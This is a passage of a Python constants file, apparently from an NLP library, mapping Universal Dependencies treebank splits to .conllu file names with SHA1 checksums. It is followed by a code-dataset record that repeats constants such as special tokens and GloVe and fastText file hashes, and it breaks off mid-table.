'5737824f0afff0d07a43db331f102d62c6da2d96'),
'test': ('ca-ud-test.conllu',
'0e28bd2a3b982515c1158194ad52bcbbe741e170'),
'train': ('ca-ud-train.conllu',
'b5ff2392722d4a1df3bfc52fa5b8f2043b7aec0c')},
'zh_cfl': {'test': ('zh_cfl-ud-test.conllu',
'32fe45cd0e4e11ced95202971bce74acbc6a8c30')},
'zh_hk': {'test': ('zh_hk-ud-test.conllu',
'4c75fa5bbcdcb181447b4e037224d50feb2776fb')},
'zh_pud': {'test': ('zh_pud-ud-test.conllu',
'b3e448884b7b6229379f9723b97c6e9a6fedcb61')},
'zh': {'dev': ('zh-ud-dev.conllu',
'34d8253b35ad2245d59ddffa71b5689ef267b6b2'),
'test': ('zh-ud-test.conllu',
'0f00516097650c12262298dd0fbd1b17a6d2bfe2'),
'train': ('zh-ud-train.conllu',
'9444eec5f4561f289ad140e47e49013689512a65')},
'cop': {'dev': ('cop-ud-dev.conllu',
'863d1004df1a92df52515105f6fae6ff68539595'),
'test': ('cop-ud-test.conllu',
'd3b33566679f071d4ad622ad840cd98381835706'),
'train': ('cop-ud-train.conllu',
'33d0e5de5d6077f7c52a4cd90bce0047f3e9ff6f')},
'hr': {'dev': ('hr-ud-dev.conllu',
'8da2a419980807d2e91e09b6bf496e58d442b0ba'),
'test': ('hr-ud-test.conllu',
'49d673cba3d32d39d413e557276a45a0214ed83e'),
'train': ('hr-ud-train.conllu',
'e5cc686bb46c80c84c3ac60ed459e1f124c04c08')},
'cs_cac': {'dev': ('cs_cac-ud-dev.conllu',
'69dfed28c29146b41a3428f4715bde70a6aecf00'),
'test': ('cs_cac-ud-test.conllu',
'a994b33ebbde486c1818a9df460fb112055e95de'),
'train': ('cs_cac-ud-train.conllu',
'694f8559471dc481612606bf5df078daa094a84e')},
'cs_cltt': {'dev': ('cs_cltt-ud-dev.conllu',
'f35d5dbe57cd95760901ea29de4f493d5d2a44d4'),
'test': ('cs_cltt-ud-test.conllu',
'a8f6696785e658471f759bc736b738a105cba9a3'),
'train': ('cs_cltt-ud-train.conllu',
'ab97886066bfa462e5da03d25f802489292c0b56')},
'cs_fictree': {'dev': ('cs_fictree-ud-dev.conllu',
'dc67c07737a3a8bf2633068941f2d55f1500e192'),
'test': ('cs_fictree-ud-test.conllu',
'06becaedef1cfdb8e1b2dce3f0d3a3a607d178a4'),
'train': ('cs_fictree-ud-train.conllu',
'fe7dbe3a0e6ee73e19e788c43bbb8f8f47ae1645')},
'cs_pud': {'test': ('cs_pud-ud-test.conllu',
'9f205677041de694157ba2ef3e1eadb44d467f2f')},
'cs': {'dev': ('cs-ud-dev.conllu',
'd609e895b21b8710337e23a98b58ffd7b7a54bf1'),
'test': ('cs-ud-test.conllu',
'34091286a11b1ce2a9c8bcfa03fdd86fb0e13965'),
'train': ('cs-ud-train.conllu',
'd1f855798a29d433b580d01ade0d8d062cd58534')},
'da': {'dev': ('da-ud-dev.conllu',
'2c0c798c20a2efb30273172d388342a82bb0ce3c'),
'test': ('da-ud-test.conllu',
'85a95a8527f8773f1575ceaf0ab51f204b211047'),
'train': ('da-ud-train.conllu',
'b653c029a7ae5c106f865dcef949fb3fe2aa0420')},
'nl_lassysmall': {'dev': ('nl_lassysmall-ud-dev.conllu',
'2a169af74c2206c9073c3932b4a300492a314ee5'),
'test': ('nl_lassysmall-ud-test.conllu',
'39f08896a40ad370f2acc37d58689cdc43a660a9'),
'train': ('nl_lassysmall-ud-train.conllu',
'e4fd6bac246c81bb17a3c932e251b8662739cc19')},
'nl': {'dev': ('nl-ud-dev.conllu',
'33a9387eef9f5c0b15bd1e76e78776863f1f6d90'),
'test': ('nl-ud-test.conllu',
'01b3e1048792c851fdd59882c353fcdb76dc165e'),
'train': ('nl-ud-train.conllu',
'8e6a10152b7d09ce61433dd5f715ab2401611cf6')},
'en_lines': {'dev': ('en_lines-ud-dev.conllu',
'83b63b7670ea4394b558bc26e16a004339f0a0ef'),
'test': ('en_lines-ud-test.conllu',
'ccc9d3c71a873313d138c3adb12405a97eb270d8'),
'train': ('en_lines-ud-train.conllu',
'da42bfac9fd97d98ebbbc37c65d83ff4c53b4e79')},
'en_pud': {'test': ('en_pud-ud-test.conllu',
'4a9c83ba058a7e51979af790ba0440cc274b948f')},
'en_partut': {'dev': ('en_partut-ud-dev.conllu',
'863a6f571158acaaca95223e50bd08fc0c1134f0'),
'test': ('en_partut-ud-test.conllu',
'0c0780b0f14e4623f1014e6496d639cd2d2f6ffd'),
'train': ('en_partut-ud-train.conllu',
'e00a2d6f7efa28c8aaa40dccdf29b59a50f48e18')},
'en': {'dev': ('en-ud-dev.conllu',
'e2159dda4400d289ad8a403b466c8d23d733ba35'),
'test': ('en-ud-test.conllu',
'bd36ef23f76155625b379d063427bd62f19b7658'),
'train': ('en-ud-train.conllu',
'993c44f62104971fe2d056847349facbb7986258')},
'et': {'dev': ('et-ud-dev.conllu',
'312f9477f7ee1dd380c1fbcf77a6f0c63476fdbb'),
'test': ('et-ud-test.conllu',
'd70907f0771b41a27406672b9d91043a0954f946'),
'train': ('et-ud-train.conllu',
'b6d788e7a3362d0984d1cff06c1ba3d66f6bf773')},
'fi_ftb': {'dev': ('fi_ftb-ud-dev.conllu',
'552ec574acdb3209e7545af4e16a43a1e2956979'),
'test': ('fi_ftb-ud-test.conllu',
'13c34838a0fa9e379f9624ed1f4c368ca50a7d98'),
'train': ('fi_ftb-ud-train.conllu',
'73d025250bfc82a24181b5ed601dc4ae7c8e846c')},
'fi_pud': {'test': ('fi_pud-ud-test.conllu',
'4ab7b0d99ce6697d79732e401be97585a28c2afa')},
'fi': {'dev': ('fi-ud-dev.conllu',
'e023cf7eaffbda20bd4518d87fe9086207bb5361'),
'test': ('fi-ud-test.conllu',
'fd57c5106e43994250f4472890572bdbb8b4a48b'),
'train': ('fi-ud-train.conllu',
'ab27bda8cbb62886196b78de87985a4c6cf8215d')},
'fr_ftb': {'dev': ('fr_ftb-ud-dev.conllu',
'71b3cc02601f64711f98e33a6b2af10aa00700be'),
'test': ('fr_ftb-ud-test.conllu',
'723b8c44e74202a18b7e71268b738a5e1aa15f86'),
'train': ('fr_ftb-ud-train.conllu',
'9a347120478254647deb7c7e02871b28aad23ec4')},
'fr_pud': {'test': ('fr_pud-ud-test.conllu',
'570b7e31dc359ed62123bea6546efa13cfc2cf25')},
'fr_partut': {'dev': ('fr_partut-ud-dev.conllu',
'1505030048829a8dccc466cc86bca057996301ae'),
'test': ('fr_partut-ud-test.conllu',
'f6446317c9f82cc0b70a76be75282804a3359ac0'),
'train': ('fr_partut-ud-train.conllu',
'f87c246cfa91186b90c7780cb64783034f196622')},
'fr_sequoia': {'dev': ('fr_sequoia-ud-dev.conllu',
'859b10d80c7b3a382571cce9b2620039673539d1'),
'test': ('fr_sequoia-ud-test.conllu',
'be0ef69e392e64030414748da2995433f23e033d'),
'train': ('fr_sequoia-ud-train.conllu',
'48ac01913518888a32670a687123ed1bac57e0e9')},
'fr': {'dev': ('fr-ud-dev.conllu',
'5de0aee778bcc69d14285ada88f0ff7e5ac0a0cd'),
'test': ('fr-ud-test.conllu',
'd20a014acd38193155a33a5233c13f89541c78c3'),
'train': ('fr-ud-train.conllu',
'feee0cc85a2d7dcb3397399ef22c8af8ef75420b')},
'gl_treegal': {'dev': ('gl_treegal-ud-dev.conllu',
'272558614cff4a5e1f2805626904e6dc488b8d25'),
'test': ('gl_treegal-ud-test.conllu',
'18d99474d3aa9c83878c42a79d7881330dd9b861'),
'train': ('gl_treegal-ud-train.conllu',
'b1691dd5f587a19eb9dc6f141ecbd3eec3bb0e07')},
'gl': {'dev': ('gl-ud-dev.conllu',
'e72390dce9bf973442deef31ed0cd7a975361fe5'),
'test': ('gl-ud-test.conllu',
'7d82ba3672bd4427674428e1dcbcae4feebc3aeb'),
'train': ('gl-ud-train.conllu',
'd586e7bffa314f8c5b85288e060e68dddc1f5d33')},
'de_pud': {'test': ('de_pud-ud-test.conllu',
'2c91e42b7345145290b68385ff5270910048b8c4')},
'de': {'dev': ('de-ud-dev.conllu',
'9b4f49bfa2b609d54369890d9e7d8d24a3c229af'),
'test': ('de-ud-test.conllu',
'48f0f6f98b38710906481b5e9fe1d459d28f1b4a'),
'train': ('de-ud-train.conllu',
'04a1d6a6a2da9d9c38496118e0432c9a6720db64')},
'got': {'dev': ('got-ud-dev.conllu',
'501c47193ca2af5826e4afcc04941df87a7c47c3'),
'test': ('got-ud-test.conllu',
'cfcf16d562434987562bd1f5faa0d8c007e9ddb8'),
'train': ('got-ud-train.conllu',
'b4951ede89d947c6617df782ac248566235f78fb')},
'el': {'dev': ('el-ud-dev.conllu',
'9df0919ed6f9dcab3ba3f60f0ad31d0c79ae6cdb'),
'test': ('el-ud-test.conllu',
'1bb4a6b24521f0c3c7d6cf71e2456ef3a1ee31aa'),
'train': ('el-ud-train.conllu',
'32f4abc821624c4cd4d3b3b555c1558f06366e2c')},
'he': {'dev': ('he-ud-dev.conllu',
'c5b76874fcf11c7733e1555957bb49e8298af140'),
'test': ('he-ud-test.conllu',
'4fbe4115948250fc2e42dd43399d1c6c11ddcfd2'),
'train': ('he-ud-train.conllu',
'eae49a515b38d224b109138bf006a112e80a7caf')},
'hi_pud': {'test': ('hi_pud-ud-test.conllu',
'd237fecc594186e7a52ad33313ac52e927905d73')},
'hi': {'dev': ('hi-ud-dev.conllu',
'48b592bb1aa1cbc30d41d2913421cfd3f9d2c790'),
'test': ('hi-ud-test.conllu',
'004a7fdde368f32f9f230bc5e2cf4ce9e1d8f8d7'),
'train': ('hi-ud-train.conllu',
'9be8afb2cabda361817c55b3de6ebba2c3fef7e0')},
'hu': {'dev': ('hu-ud-dev.conllu',
'ec622e6bcf2a84b0b47eba0de01cf5768157a50e'),
'test': ('hu-ud-test.conllu',
'fd717d25add38c2fb2dc8e82e2f9e5b0b9f3c5b8'),
'train': ('hu-ud-train.conllu',
'e5486523a8bebe40d633ad8b4050be8a3d11c78a')},
'id': {'dev': ('id-ud-dev.conllu',
'7b181aa954a4f4b22b80a18e4f67cbf423e9c701'),
'test': ('id-ud-test.conllu',
'357ed8c216725760bf5be561ed6e918ce602b5ac'),
'train': ('id-ud-train.conllu',
'328ea588b75de55ef48373c2bf9983bca277d724')},
'ga': {'dev': ('ga-ud-dev.conllu',
'180a1a9dcfcec6528a559032c67e9a15693a039d'),
'test': ('ga-ud-test.conllu',
'b74a56372af3f68f089ea82ba858e5a82aae4e22'),
'train': ('ga-ud-train.conllu',
'40df0b12fbadae6e56c0a01da483d6c612d9450c')},
'it_pud': {'test': ('it_pud-ud-test.conllu',
'c7121c03dbdc7d27f89c6f6dd8f046b89233438e')},
'it_partut': {'dev': ('it_partut-ud-dev.conllu',
'0bb5dc0c0815212c9832eaef3b802cf885e0543b'),
'test': ('it_partut-ud-test.conllu',
'b5eccd3d9a94a2f96c8c3a6e4192a287ac563898'),
'train': ('it_partut-ud-train.conllu',
'784b18bf8d3b59d967d147075a3cb5b03fb28637')},
'it_postwita': {'dev': ('it_postwita-ud-dev.conllu',
'07f6f658246aa070e2166e688f7569d61aafff54'),
'test': ('it_postwita-ud-test.conllu',
'c2d58f50e51d37cb5f55bd0a3129138e95a72a8a'),
'train': ('it_postwita-ud-train.conllu',
'69684c47fba99230f6ef1a204b95c37d28eaa5a6')},
'it': {'dev': ('it-ud-dev.conllu',
'ea8fd59f36280fbd77b9a807959491636048a698'),
'test': ('it-ud-test.conllu',
'34839fdeeef883f8034c723a18772947106cec6b'),
'train': ('it-ud-train.conllu',
'a0cae413f46a344366f86bc7ffe4f5d7ecbf6a14')},
'ja_pud': {'test': ('ja_pud-ud-test.conllu',
'4c914016a0968ca434348370d38c9579a60e8fd7')},
'ja': {'dev': ('ja-ud-dev.conllu',
'21f06fef7fbeccd05a298385bf40f8b4ffe95146'),
'test': ('ja-ud-test.conllu',
'240d3532698356a7c6f93c3215718ef2f66a672f'),
'train': ('ja-ud-train.conllu',
'35eaf307d94c2006241fe08f745d7b1b17f049cf')},
'kk': {'dev': ('kk-ud-dev.conllu',
'038033c822b407040a4ecb87c077506cd0d1a322'),
'test': ('kk-ud-test.conllu',
'4124bcaa6e4fc132613d94a882abcff8ecad8ca0'),
'train': ('kk-ud-train.conllu',
'48d664d273ad6731cb65228ce9b57ad3cf50f7f5')},
'ko': {'dev': ('ko-ud-dev.conllu',
'60e7da7cca44c923873a062e80262726659f5528'),
'test': ('ko-ud-test.conllu',
'bc9a0fc4ddfed14b70bb58048bf8b8d50062cffd'),
'train': ('ko-ud-train.conllu',
'ee21328f9ea39668e802f0cb6a794358f5c256bf')},
'kmr': {'sample': ('kmr-ud-sample.conllu',
'd76d631400d17b63b9592ce3c0f4ecada012d6d0'),
'test': ('kmr-ud-test.conllu',
'606a338db2d6adde6b4d7d8c9ee2bdf1f988d729')},
'la_ittb': {'dev': ('la_ittb-ud-dev.conllu',
'd9f17992bd0258a734aea9b6c53759039717c86a'),
'test': ('la_ittb-ud-test.conllu',
'f4d097d076083240c48594d4cb058840ff16be8e'),
'train': ('la_ittb-ud-train.conllu',
'627d5b30b20655efab194c75fc9219b0aa2cf4b6')},
'la_proiel': {'dev': ('la_proiel-ud-dev.conllu',
'9a510ff1f29b507ce46d32c04eb8f02ec8bdb4fb'),
'test': ('la_proiel-ud-test.conllu',
'697dbeae38507856a4fafa8506dfc8db5e8e4054'),
'train': ('la_proiel-ud-train.conllu',
'5e57e0a83ed8dcdfcc892c2558249cb6bc02b37a')},
'la': {'dev': ('la-ud-dev.conllu',
'2748bb0479cb599e1a007d1d1634d5870b45549b'),
'test': ('la-ud-test.conllu',
'19c62c64ce41a650e9b55a345c61e7c0d994816e'),
'train': ('la-ud-train.conllu',
'183ce6f58b0305e5926161e29b9a6aacc424662c')},
'lv': {'dev': ('lv-ud-dev.conllu',
'6bf3843d92aeb5b4a5e3b457708ad0aca176fbd2'),
'test': ('lv-ud-test.conllu',
'9f7806a24656db0e859efe041a88926b220b8e28'),
'train': ('lv-ud-train.conllu',
'f1eeff608e8f27d92b683ae041591355198841eb')},
'lt': {'dev': ('lt-ud-dev.conllu',
'0b8dc19005571fa7b66d8302b797d51a241f128b'),
'test': ('lt-ud-test.conllu',
'def54d6caf97610eb4ca8c0179d661c8eab98951'),
'train': ('lt-ud-train.conllu',
'13fe42a3d21f17a5cad5aaf38692619c7713e177')},
'mr': {'dev': ('mr-ud-dev.conllu',
'abf7ac90a3696bb979e6ddc17cbc0fc761040b1b'),
'test': ('mr-ud-test.conllu',
'b70e2a135e69dc17474951bfd9c7cf3f203d4798'),
'train': ('mr-ud-train.conllu',
'24a1370184054a7f5af647997dca783d6c571242')},
'sme': {'sample': ('sme-ud-sample.conllu',
'8c456f06b363c4d273fc454a49505f783f00fe43'),
'test': ('sme-ud-test.conllu',
'6c2084f60d7f2d1468a0cb4f4a4b9669274b122e'),
'train': ('sme-ud-train.conllu',
'203eab4183fd585efe3fea7e6df493a6746b0a9f')},
'no_bokmaal': {'dev': ('no_bokmaal-ud-dev.conllu',
'3a1aa6646ee62c605a6e5a7b535434ce93d0581f'),
'test': ('no_bokmaal-ud-test.conllu',
'18336ef0e4877ae28eb7d6019afe05b5a53245d5'),
'train': ('no_bokmaal-ud-train.conllu',
'c6a1d75956dfb9376e568bf241b3ee5ebf3be3a5')},
'no_nynorsk': {'dev': ('no_nynorsk-ud-dev.conllu',
'5b95a070d11a61a23fc340ecbbbbb70f86884498'),
'test': ('no_nynorsk-ud-test.conllu',
'3eaab8e4af82de2333521e9be0954ffaf6b1440b'),
'train': ('no_nynorsk-ud-train.conllu',
'79319993097c30ddf28d4c1137b8662f4f35d17e')},
'no_nynorsklia': {'dev': ('no_nynorsklia-ud-dev.conllu',
'f3e3cc9b156784c12e7540b6e09a19963df8d7d9'),
'test': ('no_nynorsklia-ud-test.conllu',
'c43abf4ad0d9c1d844edb9ff0fdf8b00949c4a0b')},
'cu': {'dev': ('cu-ud-dev.conllu',
'0b67035ed5ca52aeefae443611232ed202fb990a'),
'test': ('cu-ud-test.conllu',
'0fed872a5a2480b601c67ebbecf8dcd680b6863b'),
'train': ('cu-ud-train.conllu',
'1c58f7322b96aa65e2b6bbeb5cb5226b46dc3ef0')},
'fa': {'dev': ('fa-ud-dev.conllu',
'098f97ff4c0a6a9dcaafe2c83908b1ff044b4446'),
'test': ('fa-ud-test.conllu',
'0024aa6bad5eceed2e36f77d88578304a5886a80'),
'train': ('fa-ud-train.conllu',
'1692f90f58fb1ed2faaa4e8c5d2d47a37c47082b')},
'pl': {'dev': ('pl-ud-dev.conllu',
'b7af7bee091feb0788eb9793a7102972006421dc'),
'test': ('pl-ud-test.conllu',
'e141e793ba35f8a08510ec1ce494099b5c800ca8'),
'train': ('pl-ud-train.conllu',
'f2227ba184a5030fc47b1aff732e04ae11b9ab94')},
'pt_br': {'dev': ('pt_br-ud-dev.conllu',
'8eedc77096a87fe8ab251100d460780e161e5397'),
'test': ('pt_br-ud-test.conllu',
'37a64e3acef107b62ab62ce478fc36ed112fb58f'),
'train': ('pt_br-ud-train.conllu',
'023cafcb6959d52298ad619f7838f26db9798aa9')},
'pt_pud': {'test': ('pt_pud-ud-test.conllu',
'4f7a98b59255ff58a1a423dda6f2cb7261dcea7d')},
'pt': {'dev': ('pt-ud-dev.conllu',
'2171b4ac2b0726c9dfae6adf394b76be927accab'),
'test': ('pt-ud-test.conllu',
'9e819a4592db42905806141d6fca3b7b20396ce3'),
'train': ('pt-ud-train.conllu',
'b5fbb6598d5cc53a0f7e699adeb4a61948a49b5c')},
'ro_nonstandard': {'test': ('ro_nonstandard-ud-test.conllu',
'300d53091412dc5700dc5cad0fd3e136f7c8cb11'),
'train': ('ro_nonstandard-ud-train.conllu',
'ed97f51129b63857627f838f68f41c9ef8541686')},
'ro': {'dev': ('ro-ud-dev.conllu',
'a320e29582e837fa48bbe0aab8e205cadfcb4a02'),
'test': ('ro-ud-test.conllu',
'0cfe4806a28ebdc02dc7ea58635d8b550c3a9d7b'),
'train': ('ro-ud-train.conllu',
'74beb2aa92d2fca50dbb1a4f716b936afb436ab9')},
'ru_pud': {'test': ('ru_pud-ud-test.conllu',
'bca81ce7aaf3cb8add98b19faecc1d8303901631')},
'ru_syntagrus': {'dev': ('ru_syntagrus-ud-dev.conllu',
'304c6ec7fb5060583af5f890384e3a480f8c3ad5'),
'test': ('ru_syntagrus-ud-test.conllu',
'c138e39b48dc1c66d106e68ee75c6fce28ef780c'),
'train': ('ru_syntagrus-ud-train.conllu',
'8fa56fa80845e4ad946189d1e7af228b5595e312')},
'ru': {'dev': ('ru-ud-dev.conllu',
'd3b11c0fd8a87bfb7ce9666a1888126ae5ddca90'),
'test': ('ru-ud-test.conllu',
'ae13bbf49e0d2fddae8ba2eeacd15a9a77c7bfff'),
'train': ('ru-ud-train.conllu',
'fd43e7323ad2e62a6924fc5b5d48e85c6ab5a430')},
'sa': {'test': ('sa-ud-test.conllu',
'fad3a03a6834884a092b1d326625c6f663e36636')},
'sr': {'dev': ('sr-ud-dev.conllu',
'dcb9a242986285e83512ddaa4b3ada07c4cea17a'),
'test': ('sr-ud-test.conllu',
'0f0c9e394c440bb2dd514bdd6873d3ffef13821b'),
'train': ('sr-ud-train.conllu',
'97ea9bfe4ac97011598fbb5ca20b5cbaf5093334')},
'sk': {'dev': ('sk-ud-dev.conllu',
'c84563c08922d60b0c765e9f9c22d9f6f2765ff9'),
'test': ('sk-ud-test.conllu',
'89af4581c5f9058809f48788eb635a92cda0603c'),
'train': ('sk-ud-train.conllu',
'89e108093bbf5619578955fdadfe200cefd8cf01')},
'sl_sst': {'dev': ('sl_sst-ud-dev.conllu',
'c65ae82123af95ec11f47262546b5ab2fc5735e5'),
'test': ('sl_sst-ud-test.conllu',
'144a0124c1181b49d0c542a4a6d4465e45545f3b'),
'train': ('sl_sst-ud-train.conllu',
'4cbb97d5c19cfb1d85cdd54a13e24de2343a4ac5')},
'sl': {'dev': ('sl-ud-dev.conllu',
'0078572c19574d32defeae9924176da2dd701ede'),
'test': ('sl-ud-test.conllu',
'616ace00e25df99be8dd49b7bf7c48f1093df96a'),
'train': ('sl-ud-train.conllu',
'1462ac69163b30cf1399527e95f686ebf91be2d3')},
'es_ancora': {'dev': ('es_ancora-ud-dev.conllu',
'94b00cc6449a1793b5ba1d9d5c1e4b34ad1cc7d5'),
'test': ('es_ancora-ud-test.conllu',
'8d7dc8d8441e1ca4b54708a5382ed61b48bf7920'),
'train': ('es_ancora-ud-train.conllu',
'95d5bf7ad33304f3440ffb014ac094c4967c303f')},
'es_pud': {'test': ('es_pud-ud-test.conllu',
'c2b17fce1da3bdd2a50d9dd7eca101db1d2907e0')},
'es': {'dev': ('es-ud-dev.conllu',
'4cdb828c492c6b7707af0ab6c7fbf734f770630a'),
'test': ('es-ud-test.conllu',
'afd1ae1b7eb73a91456c30acf388eef4faf4785a'),
'train': ('es-ud-train.conllu',
'5ce48b44ba1b3e748a40cb5bf893d3096518ecbc')},
'sv_lines': {'dev': ('sv_lines-ud-dev.conllu',
'15f1a04d960518fe7bfee23ce227fc7b78d4b755'),
'test': ('sv_lines-ud-test.conllu',
'843df4ea3ab4f551b1eaa661652a8d6489a81d41'),
'train': ('sv_lines-ud-train.conllu',
'16e3533bf174b36d728847a36a3600f16c63baa6')},
'sv_pud': {'test': ('sv_pud-ud-test.conllu',
'18dadac0c15468256b340835ebc0529facbe9b73')},
'sv': {'dev': ('sv-ud-dev.conllu',
'6d14e1aae5c9ae37c35481c44c04bf74a4233455'),
'test': ('sv-ud-test.conllu',
'7ead0f7b49508db0022c042195ac5925b611c5b7'),
'train': ('sv-ud-train.conllu',
'68affb85efde6ed017eab1e998e9666108559e04')},
'swl': {'dev': ('swl-ud-dev.conllu',
'828e0a08f12cabfa75f9dd2b53dba58606522a7c'),
'test': ('swl-ud-test.conllu',
'674f76631cf16172d67b795ff92dfbb297eb4930'),
'train': ('swl-ud-train.conllu',
'46b721f9cae2d5ba43f818dd487600b0ce76362a')},
'ta': {'dev': ('ta-ud-dev.conllu',
'4d01f555012ddc1976933d4d928e26470f71bfa1'),
'test': ('ta-ud-test.conllu',
'e8db8816a98d8b7e81188786db7c405979a7e3c3'),
'train': ('ta-ud-train.conllu',
'6753d8c7b1b016de39c087aab45056de6021c3ae')},
'te': {'dev': ('te-ud-dev.conllu',
'29f46355d767e54e8565f76a063c43e95ead0fca'),
'test': ('te-ud-test.conllu',
'50abe345d4ab5bae021cacd096266c57b00572b8'),
'train': ('te-ud-train.conllu',
'1794469abe09e7364cda0d9764cf515dcb4a61b6')},
'tr_pud': {'test': ('tr_pud-ud-test.conllu',
'aae839e2476a2f149c98e0274d245d07a50dafaa')},
'tr': {'dev': ('tr-ud-dev.conllu',
'421de4d8d0fbdda46750523bde72880414c134a3'),
'test': ('tr-ud-test.conllu',
'b175f136f6f0271c494a58a1846971c4a07cda27'),
'train': ('tr-ud-train.conllu',
'5aeaf25fc9e00c75e377983a0d0a642e4df6ae7d')},
'uk': {'dev': ('uk-ud-dev.conllu',
'0d3e3507edcd46a3eaa8c4702d0f5d84661a6d9d'),
'test': ('uk-ud-test.conllu',
'46c88fd623894fabdafb01a826016c215e4f65cc'),
'train': ('uk-ud-train.conllu',
'd06e0e2fa67c35a20517738bd728ac3b26d8eafe')},
'hsb': {'sample': ('hsb-ud-sample.conllu',
'148eddbb19b06115ea54e17a3fca58e99a85cbd9'),
'test': ('hsb-ud-test.conllu',
'3d319288b4c06395b2627980737131995949f770')},
'ur': {'dev': ('ur-ud-dev.conllu',
'dc41e72b5adeb92f308cdc8dfcbf71f84b4a5cf9'),
'test': ('ur-ud-test.conllu',
'af5da25be4c4ec1f2a222bc462b39ca4bbcc0eb0'),
'train': ('ur-ud-train.conllu',
'488d65b394d0de264be1221614c09e541f92f9de')},
'ug': {'dev': ('ug-ud-dev.conllu',
'a2e6cd7ef51ffd7c83de7c62fbad998f1020f857'),
'test': ('ug-ud-test.conllu',
'4877323d8dbfaa8ab862f0aa8e5484fdadb9ef43')},
'vi': {'dev': ('vi-ud-dev.conllu',
'1c733d3ea3e4cce00cb0aa4d599bcb3b0a6096a8'),
'test': ('vi-ud-test.conllu',
'1bb822e58f21aa5ccac15fe6c6742a42e8389d41'),
'train': ('vi-ud-train.conllu',
'ac86132afc061625740abd524c5cdf3d35ebbbc4')}}
|
normal
|
{
"blob_id": "4dde161d25ed41154e13b94cc9640c6aac055f87",
"index": 6164,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nUNK_TOKEN = '<unk>'\nBOS_TOKEN = '<bos>'\nEOS_TOKEN = '<eos>'\nPAD_TOKEN = '<pad>'\nUNK_IDX = 0\nLARGE_POSITIVE_FLOAT = 1e+18\nLARGE_NEGATIVE_FLOAT = -LARGE_POSITIVE_FLOAT\nGLOVE_NPZ_SHA1 = {'glove.42B.300d': ('glove.42B.300d.npz',\n '7deee8f4860744db53ed9e50892effe9883e6d89'), 'glove.6B.100d': (\n 'glove.6B.100d.npz', '01f80f202fcabcc3e0804898349087bfc191dd1c'),\n 'glove.6B.200d': ('glove.6B.200d.npz',\n '5e6e2bdab346c257f88d80d215d518e680d86e32'), 'glove.6B.300d': (\n 'glove.6B.300d.npz', '1db264aa936be62f055dfb72854204450bdf4399'),\n 'glove.6B.50d': ('glove.6B.50d.npz',\n 'aa16be8d184399d2199f83fd62586f2c30497bfa'), 'glove.840B.300d': (\n 'glove.840B.300d.npz', 'b4ba390c1154736e07c0e67d9180935f5930e83c'),\n 'glove.twitter.27B.100d': ('glove.twitter.27B.100d.npz',\n '0f7b82c223451d0002f79ba23596983cdbe0e2b1'), 'glove.twitter.27B.200d':\n ('glove.twitter.27B.200d.npz',\n '41cc2d26f58a54622ce96bf6c8434360ab524f20'), 'glove.twitter.27B.25d': (\n 'glove.twitter.27B.25d.npz', '9f563d2f296995598cc46812b2fda05ad4c3c879'\n ), 'glove.twitter.27B.50d': ('glove.twitter.27B.50d.npz',\n 'ce9959c056f2a0a780c468feeb4f823af51630e9')}\nFAST_TEXT_NPZ_SHA1 = {'crawl-300d-2M': ('crawl-300d-2M.npz',\n '9dd611a1fe280c63050cd546d3595400fc0eede4'), 'wiki.aa': ('wiki.aa.npz',\n '48f163b80eb37f1806142169d3d4c05cf75b7339'), 'wiki.ab': ('wiki.ab.npz',\n '860ceff119dd27e5b701b605879037c1310cbc3e'), 'wiki.ace': (\n 'wiki.ace.npz', '62938287464040491719f56a6f521f8f808beee8'), 'wiki.ady':\n ('wiki.ady.npz', '646843afa260d018ed711df3f1ca9c3e000447b6'), 'wiki.af':\n ('wiki.af.npz', '7b14cd27690b67fea318d0bac2283c16430680e2'), 'wiki.ak':\n ('wiki.ak.npz', '20f309adad1c45958c97b6055d5838e05bbaea72'), 'wiki.als':\n ('wiki.als.npz', 'a8b03aa133c4f7da12fc27c2b167b7918b1e9805'), 'wiki.am':\n ('wiki.am.npz', 'ed3dd10cea64737f7a1623612ee099df9dc19f66'), 'wiki.ang':\n ('wiki.ang.npz', '8efe64706d9d6b8eae38b2c7ff0b277e20592bc7'), 'wiki.an':\n ('wiki.an.npz', '168046283c719ab96a29b1abae2e25a6575c7be8'), 'wiki.arc':\n ('wiki.arc.npz', '049021b7decea4bc009b12936e56b4dbf5b760e7'), 'wiki.ar':\n ('wiki.ar.npz', '7e325e1e98dfcdc9368d2ebe40ee834a2ed44912'), 'wiki.arz':\n ('wiki.arz.npz', '7d851c2c7be3ee6f7fd896de7b76ea08e3fb08b0'), 'wiki.as':\n ('wiki.as.npz', '01d38c29cd4bd99c1a8534abc058822da14a5b9c'), 'wiki.ast':\n ('wiki.ast.npz', '9c9846ba5084505a0adea89c95c66e04efbf5ce9'), 'wiki.av':\n ('wiki.av.npz', '7ef6a920c364638504e673cfde5f7675503fa81e'), 'wiki.ay':\n ('wiki.ay.npz', 'c1202e110930e3902397f5cb64a8359e013b469f'), 'wiki.azb':\n ('wiki.azb.npz', '10351b7ef14ec2cb610d290cb6a3f6987ef5d8b3'), 'wiki.az':\n ('wiki.az.npz', '74257c3bcd533a606afae509ea835dc036d61546'), 'wiki.ba':\n ('wiki.ba.npz', '4a2857ed694d66864df562b376c2fa12fcb03646'), 'wiki.bar':\n ('wiki.bar.npz', 'e65c6b7e9ff83798d1eea05d166148837d53e615'),\n 'wiki.bat_smg': ('wiki.bat_smg.npz',\n '6420584ae28ba6c9dd145fea8f096243d457c2d8'), 'wiki.bcl': (\n 'wiki.bcl.npz', '33606c970ab336b678393e2bdb8af2116d11cf7b'), 'wiki.be':\n ('wiki.be.npz', '84487d341e333344cf71bc12c7a205d923762498'), 'wiki.bg':\n ('wiki.bg.npz', '56f2a175b1a1d1a9cf9f1cea277cd0b46ffd7f66'), 'wiki.bh':\n ('wiki.bh.npz', '07473989853a344a41aaa18f41030dc56d0d01c7'), 'wiki.bi':\n ('wiki.bi.npz', '08adfa3c9ef3016d30ef69ea539d217ff67eda09'), 'wiki.bjn':\n ('wiki.bjn.npz', '998a551283222931d3a26922308449950bfa3ec7'), 'wiki.bm':\n ('wiki.bm.npz', '454ff9fbd4790e4a076d9a2087a51da28aa1332f'), 'wiki.bn':\n ('wiki.bn.npz', '1f36f6f39c9a9b33bb8035c9a4dc7e04933604fd'), 'wiki.bo':\n 
